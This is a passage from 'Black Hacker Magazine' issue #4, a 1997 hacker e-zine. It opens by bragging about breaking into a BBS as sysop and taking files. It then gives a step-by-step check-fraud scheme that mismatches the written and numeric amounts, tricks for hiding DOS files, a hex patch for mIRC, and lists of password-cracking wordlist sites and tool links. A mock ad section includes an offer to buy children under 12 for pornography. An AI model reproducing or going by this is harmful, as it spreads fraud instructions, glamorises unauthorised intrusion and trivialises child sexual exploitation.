looked through his system. Then, it was logout time. We wanted to check the files we had leeched, and we wanted to release the hack and show it to all our hacker friends at our local hpa board. And so we did. A hour later or something, we called back to the hacked board and logged in as sysop, just to fool around even more in his dos. But when we got to the 'lastcallers' he broke into chat and asked what the hell we were doing. We logged of immedeatly from the shock ;) and besides, we didn't want to chat with him right then. It's like I've always said - don't listen to what the others tell you; the first time is great! ;) .-===========================================================================-. | _/_ | Black Hacker Magazine Issue #4 | | ._______ // /]! | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | ___ __ __|_ \_.__\\ ________/______ | [a] - [b] - [C] - [d] - [e] | |(__/ \ / _ \ _ / _/_ | 094 258 1823 1945 2181 | | |____ /_ / _ /__ / _____\\ ___ \__) | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | /________\_ n o s h i t ! \/ | Misc Stuff: Just the articles | | / | we couldn't place elsewhere. | `-===[SECTION C: MISC STUFF!]================================================-' .-==[How to earn (alot of) money on Credit Check Fraud]======================-. |===[By: Codeblaster]=[BHM#4]=[01k]=[#13]=====================================| `-===========================================================================-' Ok, this works in the country I live in, and it probably does in yours to. (Haven't tried it out myself, but several sources tell me it works) You know when you pay with credit check you have to write the amount on the check both in numbers and alphabeticly. ie. if you're going to buy something that costs 100$ you fill out; $ 100 and onehundred well, the thing is - that when your account is credited (when they take the money from your bank account) they have to look at the alphabetic and NOT the numbers. so if you fill out; $ 300 and onehundred (writing onehundred really ugly - yet readable), you will get 300$ and they will only take 100$ from your bank account. Pretty cool huh ;) .-==[One of the better ways to hide DOS files (?)]===========================-. |===[By: Codeblaster]=[BHM#4]=[03k]=[#14]=====================================| `-===========================================================================-' The Happy Hacker mailing list of July 2, 1997 discussed a way of hiding DOS files. The method they described, works nice enough - but this was far from something new, as almost everyone who has been using DOS for some years knew of this little 'trick' before. What most people don't know though, is that one can use (char 32) in filenames in DOS, and make it unreadable for ALL (?) DOS programs. For those of you who don't know about the first method to hide DOS files, I'm going to explain it here; You can hide files in a directory that can't be accessed by Windows by using high chars as char 255 in the beginning or end of the directory name. To create such a dir, simply type this from DOS; C:\> MD SECRET[ALT+255] The [ALT+255] means that you hold down your ALT key, and then press 255 on your numeric keyboard (still holding down the ALT key). To access the dir you must write C:\> CD SECRET[ALT+255] In DOS, the directory will look like this; --------- Volume in drive C has no label Volume Serial Number is 3F33-16F7 Directory of C:\download\D\D . 03.08.97 17:07 . .. 03.08.97 17:07 .. SECRET� 03.08.97 17:07 SECRET� 0 file(s) 0 bytes 3 dir(s) 82 427 904 bytes free --------- But if you try to access it by typing "CD SECRET" it will just say "Invalid Directory" ... In windows the directory will look like this; "SECRET_" but if you try to access it, you'll soon find out that you can't. The dir simply can't be accessed from Windows 3.x or Win95. This way of hiding your files is secure if you're dealing with your mother etch ;), but it's not exactly safe. Everyone using NORTON COMMANDER can easily access the dir by just entering it the normal way in NC, so if you're dealing with your regular DOS user, the method above won't be safe enough. So, therefor, I'm going to show you a way to use (char 32) in your filenames, the files can be accessed by Windows then but NOT by DOS, so if you use both these tricks, your files can't be accessed from WINDOWS and neither from DOS :) ... I don't know how this works, but with this simple BASIC program I wrote, you can copy (rename) files to a filename with in it. INPUT "File to copy:", FILENAME$ INPUT "To Name (try name with space):", NEWNAME$ OPEN FILENAME$ FOR INPUT AS #1 OPEN NEWNAME$ FOR OUTPUT AS #2 DO LINE INPUT #1, a$ PRINT #2, a$ LOOP UNTIL (EOF(1)) If you just want to test the stuff, try running this program in QBASIC: OPEN "F CK" FOR OUTPUT AS #1 PRINT #1, "F UCK" CLOSE #1 ... and you'll see that it works. That file, "F UCK" can't be accessed by any dos programs like NC, or whatever. It just can't be accessed from DOS. However, if you try looking at it in Windows, that will work fine. So put it in a directory with special chars in it, so it can't be accessed from Windows either. For you to access it, you must run a QBASIC program again, and rename the files to `working filenames' ... I don't know how this works - it's kinda weird cause it only works from QBASIC... If you try writing the same code in f.ex. Pascal, you will get `Illegal Filename' ... If someone knows more about this, let me know, seems like some DOS bug or something ... Codeblaster/Food^ns!^grs .-===========================================================================-. | _/_ | Black Hacker Magazine Issue #4 | | ._______ // /]! | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | ___ __ __|_ \_.__\\ ________/______ | [a] - [b] - [c] - [D] - [e] | |(__/ \ / _ \ _ / _/_ | 094 258 1823 1945 2181 | | |____ /_ / _ /__ / _____\\ ___ \__) | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | /________\_ n o s h i t ! \/ | Internet: Sup on the net? and | | / | other stuph... | `-===[SECTION D: INTERNET]===================================================-' .-==[Hexediting your MIRC32.EXE to make it eliter! :)]=======================-. |===[By: Codeblaster]=[BHM#4]=[03k]=[#15]=====================================| `-===========================================================================-' Ok, since all of us mIRC lamers don't want those elite BitchX'ers and unix users to find out that we're actually running mIRC, I'm now going to explain how to hexedit your MIRC32.EXE so that you'll be a bit more 313371. *NOTE* To do this patch you need a hex editor. If you don't know what that is please stop reading now, and move on to the next article. If you do know what a hex editor is I recommend HEX WORKSHOP by Breakpoint Software (www.bpsoft.com). After patching MIRC32.EXE the way explained here; when other users on IRC do a VERSION on you to see what you're running they will get NO REPLY AT ALL. They won't get "Mirc 5.02 by..." or "*** lame 7thsphere" etc. they will get no respons. This is pretty kewl... :) .. oki The original MIRC32.EXE: 494F 4E00 0001 5645 5253 494F 4E01 0000 <--> ION...VERSION... 4564 6974 696E 6720 6F75 7420 7468 6520 <--> Editing out the 7665 7273 696F 6E20 7265 706C 792C 2068 <--> version reply, h 7568 3F20 3A29 0000 4E4F 5449 4345 2025 <--> uh? :)..NOTICE % 7320 3A01 5645 5253 494F 4E20 6D49 5243 <--> s :.VERSION mIRC 3332 2025 7320 4B2E 4D61 7264 616D 2D42 <--> 32 %s K.Mardam-B 6579 010A 0000 7635 2E30 3200 005B 2573 <--> ey....v5.02..[%s 2056 4552 5349 4F4E 5D00 0001 534F 554E <--> VERSION]...SOUN 4420 0000 0143 4C49 454E 5449 4E46 4F01 <--> D ...CLIENTINFO. Seems like that Khaled dude knew someone was gonna pull something like this huh? ;) Well, just use HW (or whatever hex editor you're using) to search for fex. "Editing out the" and you'll find the stuff above. Now, the new file should look like this (* = this line is changed) 494F 4E00 0001 5645 5253 494F 4E01 0000 <--> ION...VERSION... 4564 6974 696E 6720 6F75 7420 7468 6520 <--> Editing out the 7665 7273 696F 6E20 7265 706C 792C 2068 <--> version reply, h 7568 3F20 3A29 0000 4D53 4720 2020 2025 <--> uh? :)..MSG % * 7320 3A01 5645 5253 494F 4E20 2573 202D <--> s :.VERSION %s - * 2573 202D 2025 7320 2D20 2573 202D 2025 <--> %s - %s - %s - % * 7320 2D20 2573 202D 2025 7320 005B 2573 <--> s - %s - %s .[%s * 2056 4552 5349 4F4E 5D00 0001 534F 554E <--> VERSION]...SOUN 4420 0000 0143 4C49 454E 5449 4E46 4F01 <--> D ...CLIENTINFO. Ok, this patch is probably kind of lame as I did it 4 in the morning or something, but anyways, you can write anything up there. As long as you overwrite the original (NOTICE) code. I've tried to replace NOTICE with MSG to send the dude a message instead, but that didn't work either. I also experimented by putting lotsa "%s"'s in the code to see if the dude who replyed got his own nickname in return or something, but they got no reply at all, and that's the best. Have phun, and remember, you can patch other parts of MIRC32.EXE too - but don't patch too much cause then you'll probably fuck something up. Codeblaster .-==[New way of earning money on The Internet]===============================-. |===[By: Codeblaster]=[BHM#4]=[01k]=[#16]=====================================| `-===========================================================================-' If you read different internet related magazines you have probably heard of this new way of earning money (or at least get free stuff) by now. For those of you who haven't, let me explain the concept; You register your- self as a user of the service and download a program, then you are frequently sent commercial wich you view in your program. You get X points for each commecrial you view at least 5 seconds. You later use your points to order pizza, take a trip to hawaii, whatever. I think the concept originally was invented here in Scandinavia, - Scandinavians can visit www.digilog.no. US readers can find a service like this on www.freeride.com. As IU so nicely put it; "If you're struggeling to pay for the pipeline, consider selling your soul to the ad man." :) .-==[Internet Resources (kewl URLs)]=========================================-. |===[By: Codeblaster]=[BHM#4]=[08k]=[#17]=====================================| `-===========================================================================-' Resources on the ... ___ __________ _ ______ _ ________ ___________ _ ____ \ |__.----\ _| l___ __`---, __ _/_.----\ :| __`---, l___ __ S|\l :| \ \ \_ ___/__ l/ /_ /_ :| \ \ .| l/ /_ ___//_/ L| .| \ | l :| ____/ | \ .| \ | ____/ | l :| Vl____l----->___|----._____l---._____l----\____l----->___|---._____l----._____l -�--------------------------------------------------------------------------�- Ok, some articles in this magazine require that you have certain files or programs. Here's a list of some sites you can get the stuff you need at: * Wordlists: ---------- ftp.cdrom.com /.20/security/coast/dict/wordlists - they have lotsa wordlists here, and in many languages. Norwegian, Swedish, German, French, Italien etc. etc. And ofcourse in English ;) ftp.uni-koeln.de /dictionaries/ ftp.ox.ac.uk /pub/wordlists/ & /pub/comp/security/COAST/dict/wordlists - Lotsa wordlists in all languages Here are some additional sites you can check out if you really need lotsa wordlists: (I haven't check these myself) ftp.denet.dk /pub/wordlists ftp.scn.rain.com /pub/wordlists ftp.uni-trier.de /pub/wordlists ftp.dsi.unimi.it /DSI/basagni/Wordlist ftp.super.unam.mx /pub/security/tools/PGP/DSI/basagni/Wordlist ftp.hol.gr /.mirrors0/ftp.funet.fi_pub_unix/databases/biblio/PUB/KINMONTH/wordlist ftp.iij.ad.jp /academic/religious_studies/Bahai/cgi-bin/wordlist ftp.iro.umontreal.ca /pub/contrib/pinard/maintenance/ptx/rmail/tools/wordlist ftp.nj.nec.com /pub/kevin/pilot/wordlist ftp.funet.fi /pub/unix/databases/biblio/PUB/KINMONTH/wordlist ftp.ifmo.ru /pub/unix/databases/biblio/PUB/KINMONTH/wordlist ftp.aimnet.com /pub/users/jdbecker/WordList4 ftp.doc.ic.ac.uk /Mirrors/ftp.std.com/obi/WordLists ftp.ua.pt /disk3/misc/docs/obi/WordLists unix.hensa.ac.uk /mirrors/uunet/.vol/2/literary/obi/WordLists ftp.std.com /obi/WordLists ftp.uni-trier.de /pub/buecher/obi/WordLists ftp.loria.fr /pub7/obi/WordLists ftp.imw.tu-clausthal.de /mirror/ftp.mindlink.net/pub/crypto/Wordlists ftp.imw.tu-clausthal.de /mirror/ftp.wimsey.bc.ca/pub/crypto/Wordlists ftp.mindlink.net /pub/crypto/Wordlists ftp.univ-evry.fr /.00/security/wordlists ftp.inf.tu-dresden.de /.2.1/vol2/doc/dictionaries/wordlists ftp.hkstar.com /.3/COAST/dict/wordlists ftp.hkstar.com /.3/COAST/mirrors/ftp.netsys.com/wordlists ftp.waseda.ac.jp /.u5/security/wordlists ftp.doc.ic.ac.uk /Mirrors/ftp.uni-stuttgart.de/pub/systems/acorn/riscos/database/wordlists ftp.rediris.es /mirror/crypt/wordlists ftp.rediris.es /mirror/crypt/crypto/wordlists ftp.pacbell.com /mirror/sable.ox.ac.uk/wordlists ftp.pbi.net /mirror/sable.ox.ac.uk/wordlists ftp.denet.dk /mirror1/wordlists ftp.sterling.com /mirrors2/coast.cs.purdue.edu/pub/dict/wordlists ftp.sterling.com /mirrors2/coast.cs.purdue.edu/pub/mirrors/ftp.netsys.com/wordlists ftp.cenatls.cena.dgac.fr /pub/wordlists ftp.cs.ruu.nl /pub/TEX/wordlists ftp.access.digex.net /pub/access/lojbab/wordlists ftp.digex.net /pub/access/lojbab/wordlists ftp.chass.utoronto.ca /pub/cch/ ftp.auscert.org.au /pub/coast/dict/wordlists ftp.auscert.org.au /pub/coast/mirrors/ftp.netsys.com/wordlists ftp.auscert.org.au /pub/coast/mirrors/ftp.ox.ac.uk/wordlists * John The Ripper: ---------------- http://www.false.com/security/john/ - Official John The Ripper Homepage http://www3.sympatico.ca/the.chaser/PWCRACK.HTM - This site has lotsa password crackers, but do we really need anyone else than JTR? * Other interesting sites: ------------------------ http://www.netnation.com/nf_order.html - Order your own domain. And they take CC's ;) http://www.spystuff.com - Lotsa cool equiptment. They send worldwide. (bugs, bug detection, bomb detection etc.etc.) http://www.dhp.com/ - The Data Haven Project. Offering secure and private homepages for H/P http://www.feist.com/~tqdb/evis-idx.html - Great Index of H/P History. Newsclippings from 1970 -> 1997! http://www.r0ot.org - Nice url set up by Matrix, a friend of mine on ef-net. You can get all our mags here! Check it out! http://www.infowar.com - If you haven't been there yet, go there http://lod.com/ - Legion Of Doom homepage http://www.bigbook.com/ - Quickly find any of 16 million US businesses (Kinda like the Yellow pages) http://www.tollfree.att.net/dir800/ - Search for AT&T 800 numbers (by company name etc.) http://www.spectre-press.com/ - Order hacking/phreaking catalogs (they take credit cards!;) http://www.nando.net/newsroom/hacksources.html - Some info about Kevin Mitenick +++ http://www.rcn.org - RCN, a nice PC-Emag - has some H/P stuff, but mostly Warez oriented, so it should probably be considered as lame. But if you're into that kinda stuff, this is something for you. http://www.counterpane.com/blowfish.html - Explains Blowfish (Encryption) * Some extras (all HPA realated) ------------------------------ http://www.abel.net.uk/~dms/mindmain.html - Good and updated UNIX hacking page http://www.sonic.net/z/a-h.shtml - Lotsa HPA Files! http://www.geocities.com/SiliconValley/2460/files.html - Lotsa Files! Virii/hpa/etcetc. http://www.snip.net/users/jabukie/hacking.html - Lotsa Files UNIX hacking etc. http://www.trailerpark.com/phase1/Heraclit/files.htm - Links, and they work! woooah! http://www.jps.net/forest/wax/hacking.html - Nice site, some files http://www.geocities.com/CapeCanaveral/3498/security.htm - Security and Hackerscene http://sibervision.com/sh/ - Simon's Hideout http://laker.net/frozen/download.html - FileS! HPA! http://dana.ucc.nau.edu/~jer5/hack.htm - Hacking textphiles etc. http://cataract.nfss.edu.on.ca/blitz/wel.htm - Neat Site :) http://hudson.idt.net/~atahsu19/misc.html - Misc http://www.sophist.demon.co.uk/ping/ - The ping'o'death page, how to use the WIN95's ping.exe to kill servers... (ph34r!) .-===========================================================================-. | _/_ | Black Hacker Magazine Issue #4 | | ._______ // /]! | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | ___ __ __|_ \_.__\\ ________/______ | [a] - [b] - [c] - [d] - [E] | |(__/ \ / _ \ _ / _/_ | 094 258 1823 1945 2181 | | |____ /_ / _ /__ / _____\\ ___ \__) | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | | /________\_ n o s h i t ! \/ | Bye-Bye!: Closing stuph! | | / | | `-===[SECTION E: BYE-BYE!]===================================================-' .-==[This Issues CONTEST! First time EVER in BHM!]===========================-. |===[By: Codeblaster]=[BHM#4]=[01k]=[#18]=====================================| `-===========================================================================-' -�-------------------------------------------------------------------------�- � This issues fantastic contest! wow! win almost 1,000,000$ � -�-------------------------------------------------------------------------�- NS! proudly presents ... for the first time in BHM ... a... eeeei.... * C O N T E S T * We'll try to make this a tradition, and have a contest in every issue from now on. It'll be fun + we will get some more response than we normally do - and have a chance to see how many reads this magazine! Ok, this issues contest is pretty simple. The question is individual, so there are no answers that are 'correct' - all answers are correct. (ehh.. you got that?) Well, anyway, the question is ... "Which article is the best ever published in Black Hacker Magazine?" All articles from BHM#1 to BHM#4 may be voted for, the results from this contest will be released in BHM#5, winner of the contest, and and which article that got voted as best article. The winner will just be randomly picked from the ones who send us an email. The price is a, very good, expensive, hackable, free... * S H E L L - A C C O U N T * So, start sending emails to blackhackers@hotmail.com to get that shell! -�-------------------------------------------------------------------------�- .-==[Add Section! Private, personal adds here!]==============================-. |===[By: Codeblaster]=[BHM#4]=[02k]=[#19]=====================================| `-===========================================================================-' Since "Confidence Remains High" decided to follow up on PLA's (Phone Loosers of America) awesome add-section, we in Ns! found out that it's about time we have something like that too ;)... Send yar adds to rjack_@hotmail.com ............................... .............................................. : Free NetsEx! We know you're : : Body Parts Ltd. We sell/buy working livers : : horny as hell,so that's why :..:............................. hearts, arms, : : we at #bible have decided : wELP! I'm a sexy blonde bimbo : legs,and most : : to start NETSEXing! Next : who really needs a man! Dial : other parts of: : time you are on EF-NET type : 140 and tell me how much you : your body! : : /Join #bible,the magic word : you want me. The number is : Send mail to: : : is "Fuck God! Let's NetSex" : tax free of course! : Body Parts Ltd: : Please report any problems :...............................: c/o Haukeland : : to "haggai1"- I'm always ON : Want to sell your kids? : Sykehus, 5002 Bergen: :.............................: I'll pay upto 5000$ for : Norway. don't forget: : FOOD LOVERS LOOK HERE!!!! : each boy, and 6000$ (!) : to tell us what body: : A new channel on EF-NET : for girls!No older than : parts you want! : : called #food is for all u : 12 please!The kids will :.....................: : food lovers! we have all : be taken good care of, : S&M'ers look here! : : the recipes! Pizza, pan- : and become porn stars!! : 4 all you masochists: : cakes, spaghetti, gruff, : (804)-320033 for a deal : who love to be kickd: : etc.etc. Now doesn't that :.........................: and spanked hard : : sound tempting?! /Join : : join #hack and ask : : #food next time you're on : YOUR ADD COULD BE HERE : questions like "How : : ef-net. o'btw; this is : - -- ---------- -- - : do I hack Internet" : : NOT a busdrivers club!!!! : remember; advertising : We promise we will : :...........................: in BHM is completely : kick and ban you! if: : free! send your adds 2 : you're on AOL we'll : : rjack_@hotmail.com : maybe even NUKE you : : Subject: Suck me! :.....................: :............................: .-==[NoShit! BBS'(HQ's and Dist Sites)]======================================-. |===[By: Codeblaster]=[BHM#4]=[02k]=[#20]=====================================| `-===========================================================================-' __ ______ _________ _ _______ ______________ __ \_\\ _/_____________\_____ /_ __ _/______\_ _/ ____//_/ | __ / __ \ __ :| /_ \ __ :|______ / | l/ / \l \ \l .| \ \ \l .| l/ / .-------l____.---/___________\---.___|-----\_____\---.___slv---.___/---------. | | | BoardName | Status |Nds.|Number |System | Type | |=================|==========|====|==================|=======|===============| | Once Innocent | WHQ | 02 | +47-563.110.97 | PCB | Pure HPA | | | | | +47-563.XXX.XX | X | X | | Revelations | USHQ | 03 | +804-XX.XXX.XXX | | | | | | | +804-AS.K4I.T!! | | | | | | | +804-XX.XXX.XXX | | | | Midnight | BrHQ | 04 | +55-118.446.702 | PCB | HPA | | | | | +55-NEW.NUMBER? | | | | | | | +55-NEW.NUMBER? | | * also telnet | | | | | +55-NEW.NUMBER? | | | | SchizoFrenia | SHQ | 02 | +46-NOT-4LAMER | X | HPA | | | | | +46-GET-ITNOW! | | | | Dark Portal | DIST | 01 | +47-XXX.XXX.XX | PCB | SCENE/HPA | `============================================================================' Recent boardnews: SchizoFrenia moved from DistSite to Swedish HQ, since The Factory has been down way too long. Once Innocent is new WHQ, since Death Wish and Zer0 Reality both closed down. Once Innocent is run by the same people that ran DW and ZR though (Ripperjack & Codeblaster) ;) If you run a hpa/elite board then we need more dist.sites/HQ's. No more norwegian boards is accepted. .-==[That's it for this time folks! ;)]======================================-. |===[By: Codeblaster]=[BHM#4]=[01k]=[#21]=====================================| `-===========================================================================-' Well, that's it for this time. Hmm, next time we'll strike harder (I hope), cause this was a bit hurry-up release. Had to get it finished before the deadline in mid-August. Well, anyways, until next time check out my site at http://gudmund.vgs.no/~anepm/hpa/ ... we tried to set up a site at roo.transient.net/~codeblast/ but that server seems like it's down all the time. Later. - Codeblaster